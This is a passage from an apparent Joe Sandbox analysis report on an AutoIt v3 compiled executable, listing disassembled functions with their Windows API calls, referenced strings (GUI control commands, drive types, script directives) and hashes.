SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77D7A

Strings

static, xrefs: 00F77A75, 00F77BCC
DISPLAY, xrefs: 00F77BDD
AutoIt v3, xrefs: 00F77A2D
, xrefs: 00F77D00

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: deb7e79bb933cdf513fddb7ea161c4cdc907ca2947c6b79c39be4ff5902ea3c9
Instruction ID: 4005c9a0270e9f27cb4357b54f44f1731cb3e09f582f6670e34dd138be151a40
Opcode Fuzzy Hash: deb7e79bb933cdf513fddb7ea161c4cdc907ca2947c6b79c39be4ff5902ea3c9
Instruction Fuzzy Hash: 60029D71910209EFDB14EFA4CD89EAE7BB9EF48310F108159F905AB2A1D774AD01EB60

Function 00F8356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F8F910), ref: 00F83627
IsWindowVisible.USER32(?), ref: 00F8364B

Strings

ISVISIBLE, xrefs: 00F83637
HIDEDROPDOWN, xrefs: 00F83700
TABRIGHT, xrefs: 00F8369D
GETCURRENTLINE, xrefs: 00F838ED
DELSTRING, xrefs: 00F83749
GETLINE, xrefs: 00F8399B
ISCHECKED, xrefs: 00F83839
GETLINECOUNT, xrefs: 00F838C6
ISENABLED, xrefs: 00F8366B
SENDCOMMANDID, xrefs: 00F839DA
GETSELECTED, xrefs: 00F838A3
GETCURRENTCOL, xrefs: 00F83928
ADDSTRING, xrefs: 00F83716
UNCHECK, xrefs: 00F83883
SELECTSTRING, xrefs: 00F83806
GETCURRENTSELECTION, xrefs: 00F837E3
SETCURRENTSELECTION, xrefs: 00F837B6
EDITPASTE, xrefs: 00F8395F
CURRENTTAB, xrefs: 00F836BD
SHOWDROPDOWN, xrefs: 00F836E0
CHECK, xrefs: 00F8386D
TABLEFT, xrefs: 00F83687
FINDSTRING, xrefs: 00F83776

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 64ad753340a7f6b6fc899a5b38d7783f9c3b90052cf3bc359b1ba904ec00e5da
Instruction ID: 192c33916adabfed0e320a55606d933a59762e2c116ca2d5e7655d3042ef5af1
Opcode Fuzzy Hash: 64ad753340a7f6b6fc899a5b38d7783f9c3b90052cf3bc359b1ba904ec00e5da
Instruction Fuzzy Hash: 87D18C716083019BCB04FF10C891AAE77E6AF95754F544468F8825B3B3DB79EA0AFB41

Function 00F8A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F8A630
GetSysColorBrush.USER32(0000000F), ref: 00F8A661
GetSysColor.USER32(0000000F), ref: 00F8A66D
SetBkColor.GDI32(?,000000FF), ref: 00F8A687
SelectObject.GDI32(?,00000000), ref: 00F8A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A6C1
GetSysColor.USER32(00000010), ref: 00F8A6C9
CreateSolidBrush.GDI32(00000000), ref: 00F8A6D0
FrameRect.USER32(?,?,00000000), ref: 00F8A6DF
DeleteObject.GDI32(00000000), ref: 00F8A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00F8A731
FillRect.USER32(?,?,00000000), ref: 00F8A763
GetWindowLongW.USER32(?,000000F0), ref: 00F8A78E

Part of subcall function 00F8A8CA: GetSysColor.USER32(00000012), ref: 00F8A903
Part of subcall function 00F8A8CA: SetTextColor.GDI32(?,?), ref: 00F8A907
Part of subcall function 00F8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F8A91D
Part of subcall function 00F8A8CA: GetSysColor.USER32(0000000F), ref: 00F8A928
Part of subcall function 00F8A8CA: GetSysColor.USER32(00000011), ref: 00F8A945
Part of subcall function 00F8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8A953
Part of subcall function 00F8A8CA: SelectObject.GDI32(?,00000000), ref: 00F8A964
Part of subcall function 00F8A8CA: SetBkColor.GDI32(?,00000000), ref: 00F8A96D
Part of subcall function 00F8A8CA: SelectObject.GDI32(?,?), ref: 00F8A97A
Part of subcall function 00F8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A999
Part of subcall function 00F8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8A9B0
Part of subcall function 00F8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F8A9C5
Part of subcall function 00F8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8A9ED

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 701a1cf5a997f06d251313d0300e541408161e8c7e94e4d036542703adc0cffa
Instruction ID: 89eacc30c685b24d0ffea802afaab97d56350a100f9561d93cc4f9a4c8f08646
Opcode Fuzzy Hash: 701a1cf5a997f06d251313d0300e541408161e8c7e94e4d036542703adc0cffa
Instruction Fuzzy Hash: 50918F72408705EFD710AF64DC08AAB7BA9FF49331F140B2AF962D61A0D770D948EB52

Function 00F02C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00F02CA2
DeleteObject.GDI32(00000000), ref: 00F02CE8
DeleteObject.GDI32(00000000), ref: 00F02CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00F02CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00F02D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00F3C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F3C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F3C89D

Part of subcall function 00F01B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F02036,?,00000000,?,?,?,?,00F016CB,00000000,?), ref: 00F01B9A

SendMessageW.USER32(?,00001053), ref: 00F3C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F3C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F3C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00F3C912

Strings

0, xrefs: 00F3C731

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 6785279a790a2b6f5b956603d37a556b377c099e08e7210bf889b5c24383127c
Instruction ID: 775a706667bcc67663011ba0b202eed580d03a3f8b96fb7ac0790008cdc2fb0a
Opcode Fuzzy Hash: 6785279a790a2b6f5b956603d37a556b377c099e08e7210bf889b5c24383127c
Instruction Fuzzy Hash: DA128131A00201DFDB55CF24C888BA9B7E5BF45334F588569E855EB2A2C731E845FBA1

Function 00F774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F774DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F7759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F775DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F775ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F77633
GetClientRect.USER32(00000000,?), ref: 00F7763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F77683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F77692
GetStockObject.GDI32(00000011), ref: 00F776A2
SelectObject.GDI32(00000000,00000000), ref: 00F776A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F776B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F776BF
DeleteDC.GDI32(00000000), ref: 00F776C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F776F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F7770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F77746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F7775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F7776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F7779B
GetStockObject.GDI32(00000011), ref: 00F777A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F777B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F777BB

Strings

static, xrefs: 00F7767D, 00F77795
DISPLAY, xrefs: 00F77688
AutoIt v3, xrefs: 00F7762B
msctls_progress32, xrefs: 00F7773C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: d140b79bb3c493547186abe01fb23c0d381c49413b6922555631fc5dcb91ec56
Instruction ID: 1e1bc8e28d5e00007ddc4b440c5e265928cc3c6dd4638ed6a47b1c1d6489e6eb
Opcode Fuzzy Hash: d140b79bb3c493547186abe01fb23c0d381c49413b6922555631fc5dcb91ec56
Instruction Fuzzy Hash: C0A170B1A00609BFEB14DBA4DD4AFEE7BA9EB04710F048115FA15A72E0D774AD44EB60

Function 00F6AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6AD1E
GetDriveTypeW.KERNEL32(?,00F8FAC0,?,\\.\,00F8F910), ref: 00F6ADFB
SetErrorMode.KERNEL32(00000000,00F8FAC0,?,\\.\,00F8F910), ref: 00F6AF59

Strings

ATA, xrefs: 00F6AED4
SCSI, xrefs: 00F6AEC6
Unknown, xrefs: 00F6AE1B, 00F6AEBF
SSA, xrefs: 00F6AEE2
ATAPI, xrefs: 00F6AECD
MMC, xrefs: 00F6AF1A
Removable, xrefs: 00F6AE4D
PhysicalDrive, xrefs: 00F6ADA7
1394, xrefs: 00F6AEDB
SAS, xrefs: 00F6AF05
Virtual, xrefs: 00F6AF21
CDROM, xrefs: 00F6AE2F
Network, xrefs: 00F6AE39
Fixed, xrefs: 00F6AE43
Fibre, xrefs: 00F6AEE9
RAID, xrefs: 00F6AEF7
RAMDisk, xrefs: 00F6AE25
SATA, xrefs: 00F6AF0C
\\.\, xrefs: 00F6AD70
iSCSI, xrefs: 00F6AEFE
FileBackedVirtual, xrefs: 00F6AF28
USB, xrefs: 00F6AEF0
SSD, xrefs: 00F6AE86

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: f6d5e60ff99a82e84e7b3c5234c315e20f2d364e2093180d3e35d92ec247036d
Instruction ID: b5ca476a3d8c7965533541942171584138d420e17297ddd0d134187d4fc3cfa1
Opcode Fuzzy Hash: f6d5e60ff99a82e84e7b3c5234c315e20f2d364e2093180d3e35d92ec247036d
Instruction Fuzzy Hash: 225183B1A48205ABCB00EB61CE92DFD73A9EF88750B208056E407B7295DA75DD42FF53

Function 00F068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00F06931
__wcsnicmp.LIBCMT ref: 00F06949
__wcsnicmp.LIBCMT ref: 00F06961
__wcsnicmp.LIBCMT ref: 00F06979
__wcsnicmp.LIBCMT ref: 00F06991
__wcsnicmp.LIBCMT ref: 00F069A9
__wcsnicmp.LIBCMT ref: 00F069C1
__wcsnicmp.LIBCMT ref: 00F069D5
__wcsnicmp.LIBCMT ref: 00F06A16
__wcsnicmp.LIBCMT ref: 00F06A2A
__wcsnicmp.LIBCMT ref: 00F06A3E
__wcsnicmp.LIBCMT ref: 00F06A52

Strings

#OnAutoItStartRegister, xrefs: 00F06973
#requireadmin, xrefs: 00F0695B
#notrayicon, xrefs: 00F06943
Unterminated group of comments, xrefs: 00F3E403
Cannot parse #include, xrefs: 00F3E3F0
#comments-start, xrefs: 00F069BB, 00F06A10
#cs, xrefs: 00F069CF, 00F06A24
#ce, xrefs: 00F06A4C
#include, xrefs: 00F069A3
#pragma compile, xrefs: 00F0692B
#include-once, xrefs: 00F0698B
#comments-end, xrefs: 00F06A38
Bad directive syntax error, xrefs: 00F3E31A

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 499949cd768beb0335c5a889f854d53d66f4597a85631b422dbdd38475ccf50a
Instruction ID: 08163f7f30ebbfab11f1dab6fbf86ab204d77d6db4419daabedd60efc93269fb
Opcode Fuzzy Hash: 499949cd768beb0335c5a889f854d53d66f4597a85631b422dbdd38475ccf50a
Instruction Fuzzy Hash: C68108B1B04216BADF20BB60EC42FAF3768AF15720F044024F905EA1D6EB78DE55F691

Function 00F89A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F89AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F89B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00F89BA7

Strings

0, xrefs: 00F89BE4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 4580f0adae535ad4ad010fc7f0963f56355d065869b5660f88f10088c76cafe3
Instruction ID: 4f5c02c0ced35da649133c9d4b2c010ba29851cd2514b0dfbfda7e800f4dafa8
Opcode Fuzzy Hash: 4580f0adae535ad4ad010fc7f0963f56355d065869b5660f88f10088c76cafe3
Instruction Fuzzy Hash: CE02ED31608201AFE729EF14CC49BFABBE4FF49324F08452DF995962A1C7B5D844EB52

Function 00F8A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F8A903
SetTextColor.GDI32(?,?), ref: 00F8A907
GetSysColorBrush.USER32(0000000F), ref: 00F8A91D
GetSysColor.USER32(0000000F), ref: 00F8A928
CreateSolidBrush.GDI32(?), ref: 00F8A92D
GetSysColor.USER32(00000011), ref: 00F8A945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8A953
SelectObject.GDI32(?,00000000), ref: 00F8A964
SetBkColor.GDI32(?,00000000), ref: 00F8A96D
SelectObject.GDI32(?,?), ref: 00F8A97A
InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8A9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 00F8A9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8A9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F8AA14
InflateRect.USER32(?,000000FD,000000FD), ref: 00F8AA32
DrawFocusRect.USER32(?,?), ref: 00F8AA3D
GetSysColor.USER32(00000011), ref: 00F8AA4B
SetTextColor.GDI32(?,00000000), ref: 00F8AA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F8AA67
SelectObject.GDI32(?,00F8A5FA), ref: 00F8AA7E
DeleteObject.GDI32(?), ref: 00F8AA89
SelectObject.GDI32(?,?), ref: 00F8AA8F
DeleteObject.GDI32(?), ref: 00F8AA94
SetTextColor.GDI32(?,?), ref: 00F8AA9A
SetBkColor.GDI32(?,?), ref: 00F8AAA4

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 1f08de081e0714324be4fe24dbe4706bf8f744ef8cf086ab97991f061ecf3f1d
Instruction ID: aea236dbf4beecea880d99d901a97b40d46b847ebe5d983bde2f6dd4d442ff56
Opcode Fuzzy Hash: 1f08de081e0714324be4fe24dbe4706bf8f744ef8cf086ab97991f061ecf3f1d
Instruction Fuzzy Hash: 1A513C71900208EFDB10AFA4DC48EEE7B79EF08320F254226F911AB2A1D7759944EF90

Function 00F889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F88AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88AD2
CharNextW.USER32(0000014E), ref: 00F88B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F88B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F88B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F88B86
SetWindowTextW.USER32(?,0000014E), ref: 00F88BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F88BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 00F88C1F
_memset.LIBCMT ref: 00F88C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F88C8D
_memset.LIBCMT ref: 00F88CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F88D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 00F88D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 00F88E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 00F88E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F88E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F88EB4
DrawMenuBar.USER32(?), ref: 00F88EC3
SetWindowTextW.USER32(?,0000014E), ref: 00F88EEB

Strings

0, xrefs: 00F88E55

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 744c4ee2a23f675aa438e284170d8ed0f29b5b94033a433000d52167049f300a
Instruction ID: a5c16a01ea6acd0c08b4f8598050b32fb9118d70692c082c47e2f69ad79a2189
Opcode Fuzzy Hash: 744c4ee2a23f675aa438e284170d8ed0f29b5b94033a433000d52167049f300a
Instruction Fuzzy Hash: DFE19071900219AFDF20AF50CC84EFE7BB9EF05760F508156FA15AB190DB749A86EF60

Function 00F8488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F849CA
GetDesktopWindow.USER32 ref: 00F849DF
GetWindowRect.USER32(00000000), ref: 00F849E6
GetWindowLongW.USER32(?,000000F0), ref: 00F84A48
DestroyWindow.USER32(?), ref: 00F84A74
